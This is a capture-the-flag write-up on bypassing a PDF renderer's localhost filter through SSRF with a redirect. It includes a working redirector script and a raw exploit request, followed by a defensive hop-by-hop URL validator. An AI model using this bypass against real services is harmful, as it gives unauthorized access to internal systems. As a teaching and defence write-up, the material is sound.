This challenge involved a website that allowed users to specify a URL to render as a PDF. This
essentially acts as a way to perform SSRF. However, addresses such as `127.0.0.1` and their encoded
forms are rejected.

To get around this, we simply use redirect headers on our own server: the submitted URL points at a host we control, which answers with a redirect to the blocked address. I simply reused this [code snippet](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery#bypass-via-redirect):
```python
#!/usr/bin/env python3
# python3 ./redirector.py 8000 http://127.0.0.1/
import sys
from http.server import HTTPServer, BaseHTTPRequestHandler

# Expect exactly two arguments: the listening port and the redirect target.
if len(sys.argv) - 1 != 2:
    print("Usage: {} <port_number> <url>".format(sys.argv[0]))
    sys.exit()


class Redirect(BaseHTTPRequestHandler):
    def do_GET(self):
        # Answer every GET with a 302 pointing at the URL given on the command line.
        self.send_response(302)
        self.send_header('Location', sys.argv[2])
        self.end_headers()


# Listen on all interfaces on the requested port.
HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()
```
This was invoked with `python redirector.py 80 http://127.0.0.1`.
The following request was sent to the challenge server to trigger the redirect to localhost.
```
POST /convert HTTP/1.1
Host: 143.244.132.186:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://143.244.132.186:3000
Connection: close
Referer: http://143.244.132.186:3000/
Upgrade-Insecure-Requests: 1

target=http://attacker.sg.pwn
```
The resultant PDF document that gets rendered contains:
```
Welcome back to home admin! Here is your Flag: VULNCON{W3lc0me_b4ck_t0_h0m3}
```
**Flag:** `VULNCON{W3lc0me_b4ck_t0_h0m3}`
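On the defensive side, the redirect trick works when the address filter is applied only to the URL the user submits and the fetcher then follows `Location` headers unchecked. The sketch below is an added example, not the challenge's code: it validates every hop before requesting it. `fetch_checked`, `check_url`, the `fetch` callable and the `FAKE_*` tables are hypothetical names, and the DNS and HTTP data are constructed so the block runs offline.

```python
import ipaddress
import socket
from urllib.parse import urljoin, urlsplit

class BlockedTarget(Exception):
    """Raised when a hop points somewhere the renderer must not reach."""

def system_resolve(host):
    # Default resolver: every address the hostname currently maps to.
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

def check_url(url, resolve=system_resolve):
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise BlockedTarget(f"unsupported URL: {url}")
    for addr in resolve(parts.hostname):
        ip = ipaddress.ip_address(addr)
        # is_global is False for loopback, RFC 1918, link-local and similar ranges.
        if not ip.is_global:
            raise BlockedTarget(f"{url} resolves to internal address {ip}")

def fetch_checked(url, fetch, resolve=system_resolve, max_hops=5):
    """Follow redirects by hand, validating every hop before requesting it.

    fetch(url) is a hypothetical callable that performs ONE request with
    automatic redirects disabled and returns (status, headers, body).
    """
    for _ in range(max_hops + 1):
        check_url(url, resolve)
        status, headers, body = fetch(url)
        if status not in (301, 302, 303, 307, 308):
            return url, body
        url = urljoin(url, headers["Location"])
    raise BlockedTarget("too many redirects")

# Constructed stand-ins for DNS and HTTP (addresses are made up for the demo).
FAKE_DNS = {"attacker.sg.pwn": {"93.184.216.34"}, "public.example": {"93.184.215.14"}}
FAKE_WEB = {
    "http://attacker.sg.pwn": (302, {"Location": "http://127.0.0.1/"}, ""),
    "http://public.example/": (200, {}, "public page"),
    "http://127.0.0.1/": (200, {}, "internal admin page"),
}

def fake_resolve(host):
    return FAKE_DNS.get(host, {host})  # IP literals resolve to themselves

def fake_fetch(url):
    return FAKE_WEB[url]
```

Because the check resolves the name separately from the connection that follows, a production fetcher should also connect to the address it validated, so a changed DNS answer cannot slip in between the two steps.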